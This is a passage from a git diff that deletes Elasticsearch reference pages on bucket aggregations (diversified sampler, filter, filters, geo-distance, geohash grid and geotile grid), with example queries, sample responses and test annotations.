-Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "range": { - "buckets": { - "quarter_01": { - "from": 1.4200704E12, - "from_as_string": "01-2015", - "to": 1.425168E12, - "to_as_string": "03-2015", - "doc_count": 5 - }, - "quarter_02": { - "from": 1.425168E12, - "from_as_string": "03-2015", - "to": 1.4331168E12, - "to_as_string": "06-2015", - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/bucket/diversified-sampler-aggregation.asciidoc b/docs/reference/aggregations/bucket/diversified-sampler-aggregation.asciidoc deleted file mode 100644 index 4b829255db3..00000000000 --- a/docs/reference/aggregations/bucket/diversified-sampler-aggregation.asciidoc +++ /dev/null @@ -1,204 +0,0 @@ -[[search-aggregations-bucket-diversified-sampler-aggregation]] -=== Diversified sampler aggregation -++++ -Diversified sampler -++++ - -Like the `sampler` aggregation this is a filtering aggregation used to limit any sub aggregations' processing to a sample of the top-scoring documents. -The `diversified_sampler` aggregation adds the ability to limit the number of matches that share a common value such as an "author". - -NOTE: Any good market researcher will tell you that when working with samples of data it is important -that the sample represents a healthy variety of opinions rather than being skewed by any single voice. -The same is true with aggregations and sampling with these diversify settings can offer a way to remove the bias in your content (an over-populated geography, -a large spike in a timeline or an over-active forum spammer). - - -.Example use cases: -* Tightening the focus of analytics to high-relevance matches rather than the potentially very long tail of low-quality matches -* Removing bias from analytics by ensuring fair representation of content from different sources -* Reducing the running cost of aggregations that can produce useful results using only samples e.g. `significant_terms` - -A choice of `field` or `script` setting is used to provide values used for de-duplication and the `max_docs_per_value` setting controls the maximum -number of documents collected on any one shard which share a common value. The default setting for `max_docs_per_value` is 1. - -The aggregation will throw an error if the choice of `field` or `script` produces multiple values for a single document (de-duplication using multi-valued fields is not supported due to efficiency concerns). - - -Example: - -We might want to see which tags are strongly associated with `#elasticsearch` on StackOverflow -forum posts but ignoring the effects of some prolific users with a tendency to misspell #Kibana as #Cabana. - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:elasticsearch" - } - }, - "aggs": { - "my_unbiased_sample": { - "diversified_sampler": { - "shard_size": 200, - "field": "author" - }, - "aggs": { - "keywords": { - "significant_terms": { - "field": "tags", - "exclude": [ "elasticsearch" ] - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "my_unbiased_sample": { - "doc_count": 151, <1> - "keywords": { <2> - "doc_count": 151, - "bg_count": 650, - "buckets": [ - { - "key": "kibana", - "doc_count": 150, - "score": 2.213, - "bg_count": 200 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/2.213/$body.aggregations.my_unbiased_sample.keywords.buckets.0.score/] - -<1> 151 documents were sampled in total. -<2> The results of the significant_terms aggregation are not skewed by any single author's quirks because we asked for a maximum of one post from any one author in our sample. - -==== Scripted example: - -In this scenario we might want to diversify on a combination of field values. We can use a `script` to produce a hash of the -multiple values in a tags field to ensure we don't have a sample that consists of the same repeated combinations of tags. - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:kibana" - } - }, - "aggs": { - "my_unbiased_sample": { - "diversified_sampler": { - "shard_size": 200, - "max_docs_per_value": 3, - "script": { - "lang": "painless", - "source": "doc['tags'].hashCode()" - } - }, - "aggs": { - "keywords": { - "significant_terms": { - "field": "tags", - "exclude": [ "kibana" ] - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_unbiased_sample": { - "doc_count": 6, - "keywords": { - "doc_count": 6, - "bg_count": 650, - "buckets": [ - { - "key": "logstash", - "doc_count": 3, - "score": 2.213, - "bg_count": 50 - }, - { - "key": "elasticsearch", - "doc_count": 3, - "score": 1.34, - "bg_count": 200 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/2.213/$body.aggregations.my_unbiased_sample.keywords.buckets.0.score/] -// TESTRESPONSE[s/1.34/$body.aggregations.my_unbiased_sample.keywords.buckets.1.score/] - -==== shard_size - -The `shard_size` parameter limits how many top-scoring documents are collected in the sample processed on each shard. -The default value is 100. - -==== max_docs_per_value -The `max_docs_per_value` is an optional parameter and limits how many documents are permitted per choice of de-duplicating value. -The default setting is "1". - - -==== execution_hint - -The optional `execution_hint` setting can influence the management of the values used for de-duplication. -Each option will hold up to `shard_size` values in memory while performing de-duplication but the type of value held can be controlled as follows: - - - hold field values directly (`map`) - - hold ordinals of the field as determined by the Lucene index (`global_ordinals`) - - hold hashes of the field values - with potential for hash collisions (`bytes_hash`) - -The default setting is to use <> if this information is available from the Lucene index and reverting to `map` if not. -The `bytes_hash` setting may prove faster in some cases but introduces the possibility of false positives in de-duplication logic due to the possibility of hash collisions. 
-Please note that Elasticsearch will ignore the choice of execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints. - -==== Limitations - -[[div-sampler-breadth-first-nested-agg]] -===== Cannot be nested under `breadth_first` aggregations -Being a quality-based filter the diversified_sampler aggregation needs access to the relevance score produced for each document. -It therefore cannot be nested under a `terms` aggregation which has the `collect_mode` switched from the default `depth_first` mode to `breadth_first` as this discards scores. -In this situation an error will be thrown. - -===== Limited de-dup logic. -The de-duplication logic applies only at a shard level so will not apply across shards. - -[[spec-syntax-geo-date-fields]] -===== No specialized syntax for geo/date fields -Currently the syntax for defining the diversifying values is defined by a choice of `field` or -`script` - there is no added syntactical sugar for expressing geo or date units such as "7d" (7 -days). This support may be added in a later release and users will currently have to create these -sorts of values using a script. diff --git a/docs/reference/aggregations/bucket/filter-aggregation.asciidoc b/docs/reference/aggregations/bucket/filter-aggregation.asciidoc deleted file mode 100644 index a3cf365d317..00000000000 --- a/docs/reference/aggregations/bucket/filter-aggregation.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[search-aggregations-bucket-filter-aggregation]] -=== Filter aggregation -++++ -Filter -++++ - -Defines a single bucket of all the documents in the current document set context that match a specified filter. Often this will be used to narrow down the current aggregation context to a specific set of documents. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "t_shirts": { - "filter": { "term": { "type": "t-shirt" } }, - "aggs": { - "avg_price": { "avg": { "field": "price" } } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In the above example, we calculate the average price of all the products that are of type t-shirt. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "t_shirts": { - "doc_count": 3, - "avg_price": { "value": 128.33333333333334 } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/bucket/filters-aggregation.asciidoc b/docs/reference/aggregations/bucket/filters-aggregation.asciidoc deleted file mode 100644 index b7807c19029..00000000000 --- a/docs/reference/aggregations/bucket/filters-aggregation.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-aggregations-bucket-filters-aggregation]] -=== Filters aggregation -++++ -Filters -++++ - -Defines a multi bucket aggregation where each bucket is associated with a -filter. Each bucket will collect all documents that match its associated -filter. 
- -Example: - -[source,console] --------------------------------------------------- -PUT /logs/_bulk?refresh -{ "index" : { "_id" : 1 } } -{ "body" : "warning: page could not be rendered" } -{ "index" : { "_id" : 2 } } -{ "body" : "authentication error" } -{ "index" : { "_id" : 3 } } -{ "body" : "warning: connection timed out" } - -GET logs/_search -{ - "size": 0, - "aggs" : { - "messages" : { - "filters" : { - "filters" : { - "errors" : { "match" : { "body" : "error" }}, - "warnings" : { "match" : { "body" : "warning" }} - } - } - } - } -} --------------------------------------------------- - -In the above example, we analyze log messages. The aggregation will build two -collection (buckets) of log messages - one for all those containing an error, -and another for all those containing a warning. - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "messages": { - "buckets": { - "errors": { - "doc_count": 1 - }, - "warnings": { - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 9/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Anonymous filters - -The filters field can also be provided as an array of filters, as in the -following request: - -[source,console] --------------------------------------------------- -GET logs/_search -{ - "size": 0, - "aggs" : { - "messages" : { - "filters" : { - "filters" : [ - { "match" : { "body" : "error" }}, - { "match" : { "body" : "warning" }} - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The filtered buckets are returned in the same order as provided in the -request. The response for this example would be: - -[source,console-result] --------------------------------------------------- -{ - "took": 4, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "messages": { - "buckets": [ - { - "doc_count": 1 - }, - { - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 4/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -[[other-bucket]] -==== `Other` Bucket - -The `other_bucket` parameter can be set to add a bucket to the response which will contain all documents that do -not match any of the given filters. The value of this parameter can be as follows: - -`false`:: Does not compute the `other` bucket -`true`:: Returns the `other` bucket either in a bucket (named `_other_` by default) if named filters are being used, - or as the last bucket if anonymous filters are being used - -The `other_bucket_key` parameter can be used to set the key for the `other` bucket to a value other than the default `_other_`. Setting -this parameter will implicitly set the `other_bucket` parameter to `true`. - -The following snippet shows a response where the `other` bucket is requested to be named `other_messages`. 
- -[source,console] --------------------------------------------------- -PUT logs/_doc/4?refresh -{ - "body": "info: user Bob logged out" -} - -GET logs/_search -{ - "size": 0, - "aggs" : { - "messages" : { - "filters" : { - "other_bucket_key": "other_messages", - "filters" : { - "errors" : { "match" : { "body" : "error" }}, - "warnings" : { "match" : { "body" : "warning" }} - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The response would be something like the following: - -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "messages": { - "buckets": { - "errors": { - "doc_count": 1 - }, - "warnings": { - "doc_count": 2 - }, - "other_messages": { - "doc_count": 1 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/bucket/geodistance-aggregation.asciidoc b/docs/reference/aggregations/bucket/geodistance-aggregation.asciidoc deleted file mode 100644 index 202ef696053..00000000000 --- a/docs/reference/aggregations/bucket/geodistance-aggregation.asciidoc +++ /dev/null @@ -1,253 +0,0 @@ -[[search-aggregations-bucket-geodistance-aggregation]] -=== Geo-distance aggregation -++++ -Geo-distance -++++ - -A multi-bucket aggregation that works on `geo_point` fields and conceptually works very similar to the <> aggregation. The user can define a point of origin and a set of distance range buckets. The aggregation evaluate the distance of each document value from the origin point and determines the buckets it belongs to based on the ranges (a document belongs to a bucket if the distance between the document and the origin falls within the distance range of the bucket). - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggs": { - "rings_around_amsterdam": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "ranges": [ - { "to": 100000 }, - { "from": 100000, "to": 300000 }, - { "from": 300000 } - ] - } - } - } -} --------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "rings_around_amsterdam": { - "buckets": [ - { - "key": "*-100000.0", - "from": 0.0, - "to": 100000.0, - "doc_count": 3 - }, - { - "key": "100000.0-300000.0", - "from": 100000.0, - "to": 300000.0, - "doc_count": 1 - }, - { - "key": "300000.0-*", - "from": 300000.0, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -The specified field must be of type `geo_point` (which can only be set explicitly in the mappings). And it can also hold an array of `geo_point` fields, in which case all will be taken into account during aggregation. The origin point can accept all formats supported by the <>: - -* Object format: `{ "lat" : 52.3760, "lon" : 4.894 }` - this is the safest format as it is the most explicit about the `lat` & `lon` values -* String format: `"52.3760, 4.894"` - where the first number is the `lat` and the second is the `lon` -* Array format: `[4.894, 52.3760]` - which is based on the `GeoJson` standard and where the first number is the `lon` and the second one is the `lat` - -By default, the distance unit is `m` (meters) but it can also accept: `mi` (miles), `in` (inches), `yd` (yards), `km` (kilometers), `cm` (centimeters), `mm` (millimeters). - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "unit": "km", <1> - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 300 }, - { "from": 300 } - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The distances will be computed in kilometers - -There are two distance calculation modes: `arc` (the default), and `plane`. The `arc` calculation is the most accurate. The `plane` is the fastest but least accurate. Consider using `plane` when your search context is "narrow", and spans smaller geographical areas (~5km). `plane` will return higher error margins for searches across very large areas (e.g. cross continent search). The distance calculation type can be set using the `distance_type` parameter: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "unit": "km", - "distance_type": "plane", - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 300 }, - { "from": 300 } - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings_around_amsterdam": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "ranges": [ - { "to": 100000 }, - { "from": 100000, "to": 300000 }, - { "from": 300000 } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "rings_around_amsterdam": { - "buckets": { - "*-100000.0": { - "from": 0.0, - "to": 100000.0, - "doc_count": 3 - }, - "100000.0-300000.0": { - "from": 100000.0, - "to": 300000.0, - "doc_count": 1 - }, - "300000.0-*": { - "from": 300000.0, - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings_around_amsterdam": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "ranges": [ - { "to": 100000, "key": "first_ring" }, - { "from": 100000, "to": 300000, "key": "second_ring" }, - { "from": 300000, "key": "third_ring" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "rings_around_amsterdam": { - "buckets": { - "first_ring": { - "from": 0.0, - "to": 100000.0, - "doc_count": 3 - }, - "second_ring": { - "from": 100000.0, - "to": 300000.0, - "doc_count": 1 - }, - "third_ring": { - "from": 300000.0, - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - diff --git a/docs/reference/aggregations/bucket/geohashgrid-aggregation.asciidoc b/docs/reference/aggregations/bucket/geohashgrid-aggregation.asciidoc deleted file mode 100644 index 953c525627c..00000000000 --- a/docs/reference/aggregations/bucket/geohashgrid-aggregation.asciidoc +++ /dev/null @@ -1,312 +0,0 @@ -[[search-aggregations-bucket-geohashgrid-aggregation]] -=== Geohash grid aggregation -++++ -Geohash grid -++++ - -A multi-bucket aggregation that works on `geo_point` fields and groups points into buckets that represent cells in a grid. -The resulting grid can be sparse and only contains cells that have matching data. Each cell is labeled using a {wikipedia}/Geohash[geohash] which is of user-definable precision. - -* High precision geohashes have a long string length and represent cells that cover only a small area. -* Low precision geohashes have a short string length and represent cells that each cover a large area. - -Geohashes used in this aggregation can have a choice of precision between 1 and 12. - -WARNING: The highest-precision geohash of length 12 produces cells that cover less than a square metre of land and so high-precision requests can be very costly in terms of RAM and result sizes. -Please see the example below on how to first filter the aggregation to a smaller geographic area before requesting high-levels of detail. - -The specified field must be of type `geo_point` (which can only be set explicitly in the mappings) and it can also hold an array of `geo_point` fields, in which case all points will be taken into account during aggregation. 
- - -==== Simple low-precision request - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggregations": { - "large-grid": { - "geohash_grid": { - "field": "location", - "precision": 3 - } - } - } -} --------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "large-grid": { - "buckets": [ - { - "key": "u17", - "doc_count": 3 - }, - { - "key": "u09", - "doc_count": 2 - }, - { - "key": "u15", - "doc_count": 1 - } - ] - } -} -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== High-precision requests - -When requesting detailed buckets (typically for displaying a "zoomed in" map) a filter like <> should be applied to narrow the subject area otherwise potentially millions of buckets will be created and returned. - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "zoomed-in": { - "filter": { - "geo_bounding_box": { - "location": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - }, - "aggregations": { - "zoom1": { - "geohash_grid": { - "field": "location", - "precision": 8 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The geohashes returned by the `geohash_grid` aggregation can be also used for zooming in. To zoom into the -first geohash `u17` returned in the previous example, it should be specified as both `top_left` and `bottom_right` corner: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "zoomed-in": { - "filter": { - "geo_bounding_box": { - "location": { - "top_left": "u17", - "bottom_right": "u17" - } - } - }, - "aggregations": { - "zoom1": { - "geohash_grid": { - "field": "location", - "precision": 8 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "zoomed-in": { - "doc_count": 3, - "zoom1": { - "buckets": [ - { - "key": "u173zy3j", - "doc_count": 1 - }, - { - "key": "u173zvfz", - "doc_count": 1 - }, - { - "key": "u173zt90", - "doc_count": 1 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -For "zooming in" on the system that don't support geohashes, the bucket keys should be translated into bounding boxes using -one of available geohash libraries. 
For example, for javascript the https://github.com/sunng87/node-geohash[node-geohash] library -can be used: - -[source,js] --------------------------------------------------- -var geohash = require('ngeohash'); - -// bbox will contain [ 52.03125, 4.21875, 53.4375, 5.625 ] -// [ minlat, minlon, maxlat, maxlon] -var bbox = geohash.decode_bbox('u17'); --------------------------------------------------- -// NOTCONSOLE - -==== Requests with additional bounding box filtering - -The `geohash_grid` aggregation supports an optional `bounds` parameter -that restricts the points considered to those that fall within the -bounds provided. The `bounds` parameter accepts the bounding box in -all the same <> of the -bounds specified in the Geo Bounding Box Query. This bounding box can be used with or -without an additional `geo_bounding_box` query filtering the points prior to aggregating. -It is an independent bounding box that can intersect with, be equal to, or be disjoint -to any additional `geo_bounding_box` queries defined in the context of the aggregation. - -[source,console,id=geohashgrid-aggregation-with-bounds] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "tiles-in-bounds": { - "geohash_grid": { - "field": "location", - "precision": 8, - "bounds": { - "top_left": "53.4375, 4.21875", - "bottom_right": "52.03125, 5.625" - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "tiles-in-bounds": { - "buckets": [ - { - "key": "u173zy3j", - "doc_count": 1 - }, - { - "key": "u173zvfz", - "doc_count": 1 - }, - { - "key": "u173zt90", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== Cell dimensions at the equator -The table below shows the metric dimensions for cells covered by various string lengths of geohash. -Cell dimensions vary with latitude and so the table is for the worst-case scenario at the equator. - -[horizontal] -*GeoHash length*:: *Area width x height* -1:: 5,009.4km x 4,992.6km -2:: 1,252.3km x 624.1km -3:: 156.5km x 156km -4:: 39.1km x 19.5km -5:: 4.9km x 4.9km -6:: 1.2km x 609.4m -7:: 152.9m x 152.4m -8:: 38.2m x 19m -9:: 4.8m x 4.8m -10:: 1.2m x 59.5cm -11:: 14.9cm x 14.9cm -12:: 3.7cm x 1.9cm - - -[discrete] -[role="xpack"] -==== Aggregating `geo_shape` fields - -Aggregating on <> fields works just as it does for points, except that a single -shape can be counted for in multiple tiles. A shape will contribute to the count of matching values -if any part of its shape intersects with that tile. Below is an image that demonstrates this: - - -image:images/spatial/geoshape_grid.png[] - -==== Options - -[horizontal] -field:: Mandatory. The name of the field indexed with GeoPoints. - -precision:: Optional. The string length of the geohashes used to define - cells/buckets in the results. Defaults to 5. - The precision can either be defined in terms of the integer - precision levels mentioned above. Values outside of [1,12] will - be rejected. - Alternatively, the precision level can be approximated from a - distance measure like "1km", "10m". The precision level is - calculate such that cells will not exceed the specified - size (diagonal) of the required precision. 
When this would lead - to precision levels higher than the supported 12 levels, - (e.g. for distances <5.6cm) the value is rejected. - -bounds:: Optional. The bounding box to filter the points in the bucket. - -size:: Optional. The maximum number of geohash buckets to return - (defaults to 10,000). When results are trimmed, buckets are - prioritised based on the volumes of documents they contain. - -shard_size:: Optional. To allow for more accurate counting of the top cells - returned in the final result the aggregation defaults to - returning `max(10,(size x number-of-shards))` buckets from each - shard. If this heuristic is undesirable, the number considered - from each shard can be over-ridden using this parameter. diff --git a/docs/reference/aggregations/bucket/geotilegrid-aggregation.asciidoc b/docs/reference/aggregations/bucket/geotilegrid-aggregation.asciidoc deleted file mode 100644 index e6be07633c0..00000000000 --- a/docs/reference/aggregations/bucket/geotilegrid-aggregation.asciidoc +++ /dev/null @@ -1,255 +0,0 @@ -[[search-aggregations-bucket-geotilegrid-aggregation]] -=== Geotile grid aggregation -++++ -Geotile grid -++++ - -A multi-bucket aggregation that works on `geo_point` fields and groups points into -buckets that represent cells in a grid. The resulting grid can be sparse and only -contains cells that have matching data. Each cell corresponds to a -{wikipedia}/Tiled_web_map[map tile] as used by many online map -sites. Each cell is labeled using a "{zoom}/{x}/{y}" format, where zoom is equal -to the user-specified precision. - -* High precision keys have a larger range for x and y, and represent tiles that -cover only a small area. -* Low precision keys have a smaller range for x and y, and represent tiles that -each cover a large area. - -See https://wiki.openstreetmap.org/wiki/Zoom_levels[Zoom level documentation] -on how precision (zoom) correlates to size on the ground. Precision for this -aggregation can be between 0 and 29, inclusive. - -WARNING: The highest-precision geotile of length 29 produces cells that cover -less than a 10cm by 10cm of land and so high-precision requests can be very -costly in terms of RAM and result sizes. Please see the example below on how -to first filter the aggregation to a smaller geographic area before requesting -high-levels of detail. - -The specified field must be of type `geo_point` (which can only be set -explicitly in the mappings) and it can also hold an array of `geo_point` -fields, in which case all points will be taken into account during aggregation. 
- - -==== Simple low-precision request - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggregations": { - "large-grid": { - "geotile_grid": { - "field": "location", - "precision": 8 - } - } - } -} --------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "large-grid": { - "buckets": [ - { - "key": "8/131/84", - "doc_count": 3 - }, - { - "key": "8/129/88", - "doc_count": 2 - }, - { - "key": "8/131/85", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== High-precision requests - -When requesting detailed buckets (typically for displaying a "zoomed in" map) -a filter like <> should be -applied to narrow the subject area otherwise potentially millions of buckets -will be created and returned. - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "zoomed-in": { - "filter": { - "geo_bounding_box": { - "location": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - }, - "aggregations": { - "zoom1": { - "geotile_grid": { - "field": "location", - "precision": 22 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "zoomed-in": { - "doc_count": 3, - "zoom1": { - "buckets": [ - { - "key": "22/2154412/1378379", - "doc_count": 1 - }, - { - "key": "22/2154385/1378332", - "doc_count": 1 - }, - { - "key": "22/2154259/1378425", - "doc_count": 1 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -==== Requests with additional bounding box filtering - -The `geotile_grid` aggregation supports an optional `bounds` parameter -that restricts the points considered to those that fall within the -bounds provided. The `bounds` parameter accepts the bounding box in -all the same <> of the -bounds specified in the Geo Bounding Box Query. This bounding box can be used with or -without an additional `geo_bounding_box` query filtering the points prior to aggregating. -It is an independent bounding box that can intersect with, be equal to, or be disjoint -to any additional `geo_bounding_box` queries defined in the context of the aggregation. 
- -[source,console,id=geotilegrid-aggregation-with-bounds] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggregations": { - "tiles-in-bounds": { - "geotile_grid": { - "field": "location", - "precision": 22, - "bounds": { - "top_left": "52.4, 4.9", - "bottom_right": "52.3, 5.0" - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "tiles-in-bounds": { - "buckets": [ - { - "key": "22/2154412/1378379", - "doc_count": 1 - }, - { - "key": "22/2154385/1378332", - "doc_count": 1 - }, - { - "key": "22/2154259/1378425", - "doc_count": 1 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -[discrete] -[role="xpack"] -==== Aggregating `geo_shape` fields - -Aggregating on <> fields works just as it does for points, except that a single -shape can be counted for in multiple tiles. A shape will contribute to the count of matching values -if any part of its shape intersects with that tile. Below is an image that demonstrates this: - - -image:images/spatial/geoshape_grid.png[] - -==== Options - -[horizontal] -field:: Mandatory. The name of the field indexed with GeoPoints. - -precision:: Optional. The integer zoom of the key used to define - cells/buckets in the results. Defaults to 7. - Values outside of [0,29] will be rejected. - -bounds: Optional. The bounding box to filter the points in the bucket. - -size:: Optional. The maximum number of geohash buckets to return - (defaults to 10,000). When results are trimmed, buckets are - prioritised based on the volumes of documents they contain. - -shard_size:: Optional. To allow for more accurate counting of the top cells - returned in the final result the aggregation defaults to - returning `max(10,(size x number-of-shards))` buckets from each - shard. If this heuristic is undesirable, the number considered - from each shard can be over-ridden using this parameter. diff --git a/docs/reference/aggregations/bucket/global-aggregation.asciidoc b/docs/reference/aggregations/bucket/global-aggregation.asciidoc deleted file mode 100644 index 72673586861..00000000000 --- 